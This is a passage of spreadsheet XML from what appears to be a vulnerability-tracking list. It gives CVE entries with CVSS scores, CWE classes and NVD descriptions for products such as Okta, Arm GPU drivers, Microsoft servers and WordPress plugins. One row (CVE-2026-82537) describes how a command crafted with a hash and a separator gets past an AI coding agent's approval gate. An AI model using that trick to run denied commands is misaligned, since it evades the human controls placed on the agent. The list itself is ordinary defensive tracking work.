t="inlineStr"><is><t>okta</t></is></c><c r="K708" s="5" t="inlineStr" /><c r="L708" s="5" t="inlineStr" /><c r="M708" s="5" t="inlineStr" /><c r="N708" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O708" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P708" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q708" s="5" t="inlineStr" /><c r="R708" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S708" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not sanitize SAML assertion values before interpolating them into database queries in the advanced mode datastore configuration. The unsanitized values are substituted directly into the query string prior to preparation, resulting in unintended SQL execution against the configured backend database.</t></is></c><c r="T708" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78623</t></is></c></row><row r="709"><c r="A709" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B709" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C709" s="5" t="inlineStr"><is><t>CVE-2026-82537</t></is></c><c r="D709" s="5" t="n"><v>7.7</v></c><c r="E709" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F709" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G709" s="5" t="inlineStr" /><c r="H709" s="5" t="n"><v>0.003</v></c><c r="I709" s="5" t="inlineStr" /><c r="J709" s="5" t="inlineStr" /><c r="K709" s="5" t="inlineStr" /><c r="L709" s="5" t="inlineStr" /><c r="M709" s="5" t="inlineStr" /><c r="N709" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O709" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P709" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q709" s="5" t="inlineStr" /><c r="R709" s="5" t="inlineStr"><is><t>CWE-436</t></is></c><c r="S709" s="5" t="inlineStr"><is><t>Roo-Code through 3.54.0 contains an auto-approve bypass vulnerability that allows attackers to execute denied shell commands by exploiting a word-boundary mismatch in comment handling between the approval gate's shell parser and bash. Attackers can craft a command string with an allowlisted word immediately followed by a hash character, separator, and denied command to pass the approval gate while bash executes the denied command with the agent's auto-execute privileges on the developer's machine.</t></is></c><c r="T709" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82537</t></is></c></row><row r="710"><c r="A710" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B710" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C710" s="5" t="inlineStr"><is><t>CVE-2026-9040</t></is></c><c r="D710" s="5" t="n"><v>7.7</v></c><c r="E710" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F710" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G710" s="5" t="inlineStr" /><c r="H710" s="5" t="n"><v>0.001</v></c><c r="I710" s="5" t="inlineStr" /><c r="J710" s="5" t="inlineStr" /><c r="K710" s="5" t="inlineStr" /><c r="L710" s="5" t="inlineStr" /><c r="M710" s="5" t="inlineStr" /><c r="N710" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O710" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P710" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q710" s="5" t="inlineStr" /><c r="R710" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S710" s="5" t="inlineStr"><is><t>A race condition vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to cause a denial of service or disclose sensitive information.



This issue affects Bifrost GPU Kernel Driver: from r12p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r19p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T710" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9040</t></is></c></row><row r="711"><c r="A711" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B711" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C711" s="5" t="inlineStr"><is><t>CVE-2026-77110</t></is></c><c r="D711" s="5" t="n"><v>7.6</v></c><c r="E711" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F711" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G711" s="5" t="inlineStr" /><c r="H711" s="5" t="n"><v>0.007</v></c><c r="I711" s="5" t="inlineStr" /><c r="J711" s="5" t="inlineStr" /><c r="K711" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L711" s="5" t="inlineStr" /><c r="M711" s="5" t="inlineStr" /><c r="N711" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O711" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P711" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q711" s="5" t="inlineStr" /><c r="R711" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S711" s="5" t="inlineStr"><is><t>Adobe Commerce is affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in a Security feature bypass. An attacker with high privileges could leverage this vulnerability to access unauthorized files or directories outside the intended restrictions, causing a limited disruption to availability. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T711" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77110</t></is></c></row><row r="712"><c r="A712" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B712" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C712" s="5" t="inlineStr"><is><t>CVE-2026-82053</t></is></c><c r="D712" s="5" t="n"><v>7.6</v></c><c r="E712" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F712" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G712" s="5" t="inlineStr" /><c r="H712" s="5" t="n"><v>0.002</v></c><c r="I712" s="5" t="inlineStr" /><c r="J712" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K712" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L712" s="5" t="inlineStr" /><c r="M712" s="5" t="inlineStr" /><c r="N712" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O712" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P712" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q712" s="5" t="inlineStr" /><c r="R712" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S712" s="5" t="inlineStr"><is><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is></c><c r="T712" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t></is></c></row><row r="713"><c r="A713" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B713" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C713" s="5" t="inlineStr"><is><t>CVE-2026-86073</t></is></c><c r="D713" s="5" t="n"><v>7.6</v></c><c r="E713" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F713" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G713" s="5" t="inlineStr" /><c r="H713" s="5" t="n"><v>0.002</v></c><c r="I713" s="5" t="inlineStr" /><c r="J713" s="5" t="inlineStr" /><c r="K713" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L713" s="5" t="inlineStr" /><c r="M713" s="5" t="inlineStr" /><c r="N713" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O713" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P713" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q713" s="5" t="inlineStr" /><c r="R713" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S713" s="5" t="inlineStr"><is><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is></c><c r="T713" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86073</t></is></c></row><row r="714"><c r="A714" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B714" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C714" s="5" t="inlineStr"><is><t>CVE-2026-0860</t></is></c><c r="D714" s="5" t="n"><v>7.5</v></c><c r="E714" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F714" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G714" s="5" t="inlineStr" /><c r="H714" s="5" t="n"><v>0.002</v></c><c r="I714" s="5" t="inlineStr" /><c r="J714" s="5" t="inlineStr" /><c r="K714" s="5" t="inlineStr" /><c r="L714" s="5" t="inlineStr" /><c r="M714" s="5" t="inlineStr" /><c r="N714" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O714" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P714" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q714" s="5" t="inlineStr" /><c r="R714" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="S714" s="5" t="inlineStr"><is><t>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to gain access to sensitive kernel information.



This issue affects Valhall GPU Kernel Driver: from r29p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T714" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0860</t></is></c></row><row r="715"><c r="A715" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B715" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C715" s="5" t="inlineStr"><is><t>CVE-2026-16025</t></is></c><c r="D715" s="5" t="n"><v>7.5</v></c><c r="E715" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F715" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G715" s="5" t="inlineStr" /><c r="H715" s="5" t="n"><v>0.003</v></c><c r="I715" s="5" t="inlineStr" /><c r="J715" s="5" t="inlineStr" /><c r="K715" s="5" t="inlineStr" /><c r="L715" s="5" t="inlineStr" /><c r="M715" s="5" t="inlineStr" /><c r="N715" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O715" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P715" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q715" s="5" t="inlineStr" /><c r="R715" s="5" t="inlineStr"><is><t>CWE-1284</t></is></c><c r="S715" s="5" t="inlineStr"><is><t>Improper validation of specified quantity in input vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Input Data Manipulation.

This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t></is></c><c r="T715" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16025</t></is></c></row><row r="716"><c r="A716" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B716" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C716" s="5" t="inlineStr"><is><t>CVE-2026-16037</t></is></c><c r="D716" s="5" t="n"><v>7.5</v></c><c r="E716" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F716" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G716" s="5" t="inlineStr" /><c r="H716" s="5" t="n"><v>0.003</v></c><c r="I716" s="5" t="inlineStr" /><c r="J716" s="5" t="inlineStr" /><c r="K716" s="5" t="inlineStr" /><c r="L716" s="5" t="inlineStr" /><c r="M716" s="5" t="inlineStr" /><c r="N716" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O716" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P716" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q716" s="5" t="inlineStr" /><c r="R716" s="5" t="inlineStr"><is><t>CWE-208</t></is></c><c r="S716" s="5" t="inlineStr"><is><t>Observable timing discrepancy vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Black Box Reverse Engineering.

This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t></is></c><c r="T716" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16037</t></is></c></row><row r="717"><c r="A717" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B717" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C717" s="5" t="inlineStr"><is><t>CVE-2026-16497</t></is></c><c r="D717" s="5" t="n"><v>7.5</v></c><c r="E717" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F717" s="5" t="inlineStr"><is><t>psirt@nvidia.com</t></is></c><c r="G717" s="5" t="inlineStr" /><c r="H717" s="5" t="n"><v>0.004</v></c><c r="I717" s="5" t="inlineStr" /><c r="J717" s="5" t="inlineStr" /><c r="K717" s="5" t="inlineStr" /><c r="L717" s="5" t="inlineStr" /><c r="M717" s="5" t="inlineStr" /><c r="N717" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O717" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P717" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q717" s="5" t="inlineStr" /><c r="R717" s="5" t="inlineStr"><is><t>CWE-834</t></is></c><c r="S717" s="5" t="inlineStr"><is><t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could cause excessive iteration. A successful exploit of this vulnerability might lead to denial of service.</t></is></c><c r="T717" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16497</t></is></c></row><row r="718"><c r="A718" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B718" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C718" s="5" t="inlineStr"><is><t>CVE-2026-28604</t></is></c><c r="D718" s="5" t="n"><v>7.5</v></c><c r="E718" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F718" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G718" s="5" t="inlineStr" /><c r="H718" s="5" t="n"><v>0.002</v></c><c r="I718" s="5" t="inlineStr" /><c r="J718" s="5" t="inlineStr" /><c r="K718" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L718" s="5" t="inlineStr" /><c r="M718" s="5" t="inlineStr" /><c r="N718" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O718" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P718" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q718" s="5" t="inlineStr" /><c r="R718" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S718" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible use after free due to a race condition. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T718" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28604</t></is></c></row><row r="719"><c r="A719" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B719" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C719" s="5" t="inlineStr"><is><t>CVE-2026-3174</t></is></c><c r="D719" s="5" t="n"><v>7.5</v></c><c r="E719" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F719" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G719" s="5" t="inlineStr" /><c r="H719" s="5" t="n"><v>0.003</v></c><c r="I719" s="5" t="inlineStr" /><c r="J719" s="5" t="inlineStr" /><c r="K719" s="5" t="inlineStr" /><c r="L719" s="5" t="inlineStr" /><c r="M719" s="5" t="inlineStr" /><c r="N719" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O719" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P719" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q719" s="5" t="inlineStr" /><c r="R719" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S719" s="5" t="inlineStr"><is><t>The Event Tickets and Registration plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the Stripe OAuth return endpoint in all versions up to, and including, 5.27.4. This makes it possible for unauthenticated attackers to overwrite the site's Stripe merchant credentials (access tokens, publishable keys, and account ID), diverting all subsequent payment processing to the attacker's Stripe account.</t></is></c><c r="T719" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-3174</t></is></c></row><row r="720"><c r="A720" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B720" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C720" s="5" t="inlineStr"><is><t>CVE-2026-47625</t></is></c><c r="D720" s="5" t="n"><v>7.5</v></c><c r="E720" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F720" s="5" t="inlineStr"><is><t>psirt@nvidia.com</t></is></c><c r="G720" s="5" t="inlineStr" /><c r="H720" s="5" t="n"><v>0.004</v></c><c r="I720" s="5" t="inlineStr" /><c r="J720" s="5" t="inlineStr" /><c r="K720" s="5" t="inlineStr" /><c r="L720" s="5" t="inlineStr" /><c r="M720" s="5" t="inlineStr" /><c r="N720" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O720" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P720" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q720" s="5" t="inlineStr" /><c r="R720" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S720" s="5" t="inlineStr"><is><t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could abuse missing authorization. A successful exploit of this vulnerability might lead to information disclosure, data tampering, and denial of service.</t></is></c><c r="T720" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-47625</t></is></c></row><row r="721"><c r="A721" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B721" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C721" s="5" t="inlineStr"><is><t>CVE-2026-48888</t></is></c><c r="D721" s="5" t="n"><v>7.5</v></c><c r="E721" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F721" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G721" s="5" t="inlineStr" /><c r="H721" s="5" t="n"><v>0.003</v></c><c r="I721" s="5" t="inlineStr" /><c r="J721" s="5" t="inlineStr" /><c r="K721" s="5" t="inlineStr" /><c r="L721" s="5" t="inlineStr" /><c r="M721" s="5" t="inlineStr" /><c r="N721" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O721" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P721" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q721" s="5" t="inlineStr" /><c r="R721" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S721" s="5" t="inlineStr"><is><t>Allocation of Resources Without Limits or Throttling vulnerability in Automattic WooCommerce allows HTTP DoS.

This issue affects WooCommerce: from n/a before 11.1.0.</t></is></c><c r="T721" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-48888</t></is></c></row><row r="722"><c r="A722" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B722" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C722" s="5" t="inlineStr"><is><t>CVE-2026-57098</t></is></c><c r="D722" s="5" t="n"><v>7.5</v></c><c r="E722" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F722" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G722" s="5" t="inlineStr" /><c r="H722" s="5" t="n"><v>0.006</v></c><c r="I722" s="5" t="inlineStr" /><c r="J722" s="5" t="inlineStr" /><c r="K722" s="5" t="inlineStr"><is><t>microsoft:remote_desktop_client</t></is></c><c r="L722" s="5" t="inlineStr" /><c r="M722" s="5" t="inlineStr" /><c r="N722" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O722" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P722" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q722" s="5" t="inlineStr" /><c r="R722" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S722" s="5" t="inlineStr"><is><t>Improper verification of cryptographic signature in Windows RDP Client allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T722" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-57098</t></is></c></row><row r="723"><c r="A723" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B723" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C723" s="5" t="inlineStr"><is><t>CVE-2026-57099</t></is></c><c r="D723" s="5" t="n"><v>7.5</v></c><c r="E723" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F723" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G723" s="5" t="inlineStr" /><c r="H723" s="5" t="n"><v>0.008</v></c><c r="I723" s="5" t="inlineStr" /><c r="J723" s="5" t="inlineStr" /><c r="K723" s="5" t="inlineStr" /><c r="L723" s="5" t="inlineStr" /><c r="M723" s="5" t="inlineStr" /><c r="N723" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O723" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P723" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q723" s="5" t="inlineStr" /><c r="R723" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S723" s="5" t="inlineStr"><is><t>Allocation of resources without limits or throttling in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T723" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-57099</t></is></c></row><row r="724"><c r="A724" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B724" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C724" s="5" t="inlineStr"><is><t>CVE-2026-62759</t></is></c><c r="D724" s="5" t="n"><v>7.5</v></c><c r="E724" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F724" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G724" s="5" t="inlineStr" /><c r="H724" s="5" t="n"><v>0.003</v></c><c r="I724" s="5" t="inlineStr" /><c r="J724" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K72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24" s="5" t="inlineStr" /><c r="M724" s="5" t="inlineStr" /><c r="N724" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O724" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P724" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q724" s="5" t="inlineStr" /><c r="R724" s="5" t="inlineStr"><is><t>CWE-290</t></is></c><c r="S724" s="5" t="inlineStr"><is><t>Authentication bypass by spoofing in Windows Netlogon allows an unauthorized attacker to perform spoofing over an adjacent network.</t></is></c><c r="T724" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62759</t></is></c></row><row r="725"><c r="A725" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B725" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C725" s="5" t="inlineStr"><is><t>CVE-2026-62813</t></is></c><c r="D725" s="5" t="n"><v>7.5</v></c><c r="E725" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F725" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G725" s="5" t="inlineStr" /><c r="H725" s="5" t="n"><v>0.006</v></c><c r="I725" s="5" t="inlineStr" /><c r="J725" s="5" t="inlineStr" /><c r="K725" s="5" t="inlineStr" /><c r="L725" s="5" t="inlineStr" /><c r="M725" s="5" t="inlineStr" /><c r="N725" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O725" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P725" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q725" s="5" t="inlineStr" /><c r="R725" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S725" s="5" t="inlineStr"><is><t>Use after free in Active Directory Domain Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T725" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62813</t></is></c></row><row r="726"><c r="A726" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B726" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C726" s="5" t="inlineStr"><is><t>CVE-2026-66304</t></is></c><c r="D726" s="5" t="n"><v>7.5</v></c><c r="E726" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F726" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G726" s="5" t="inlineStr" /><c r="H726" s="5" t="n"><v>0.007</v></c><c r="I726" s="5" t="inlineStr" /><c r="J726" s="5" t="inlineStr" /><c r="K726" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L726" s="5" t="inlineStr" /><c r="M726" s="5" t="inlineStr" /><c r="N726" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O726" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P726" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q726" s="5" t="inlineStr" /><c r="R726" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S726" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Skype for Business allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T726" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66304</t></is></c></row><row r="727"><c r="A727" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B727" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C727" s="5" t="inlineStr"><is><t>CVE-2026-66307</t></is></c><c r="D727" s="5" t="n"><v>7.5</v></c><c r="E727" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F727" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G727" s="5" t="inlineStr" /><c r="H727" s="5" t="n"><v>0.006</v></c><c r="I727" s="5" t="inlineStr" /><c r="J727" s="5" t="inlineStr" /><c r="K727" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L727" s="5" t="inlineStr" /><c r="M727" s="5" t="inlineStr" /><c r="N727" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O727" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P727" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q727" s="5" t="inlineStr" /><c r="R727" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S727" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Skype for Business allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T727" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66307</t></is></c></row><row r="728"><c r="A728" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B728" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C728" s="5" t="inlineStr"><is><t>CVE-2026-67376</t></is></c><c r="D728" s="5" t="n"><v>7.5</v></c><c r="E728" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F728" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G728" s="5" t="inlineStr" /><c r="H728" s="5" t="n"><v>0.008</v></c><c r="I728" s="5" t="inlineStr" /><c r="J728" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K728" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L728" s="5" t="inlineStr" /><c r="M728" s="5" t="inlineStr" /><c r="N728" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O728" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P728" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q728" s="5" t="inlineStr" /><c r="R728" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S728" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T728" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t></is></c></row><row r="729"><c r="A729" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B729" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C729" s="5" t="inlineStr"><is><t>CVE-2026-68887</t></is></c><c r="D729" s="5" t="n"><v>7.5</v></c><c r="E729" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F729" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G729" s="5" t="inlineStr" /><c r="H729" s="5" t="n"><v>0.008</v></c><c r="I729" s="5" t="inlineStr" /><c r="J729" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K72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29" s="5" t="inlineStr" /><c r="M729" s="5" t="inlineStr" 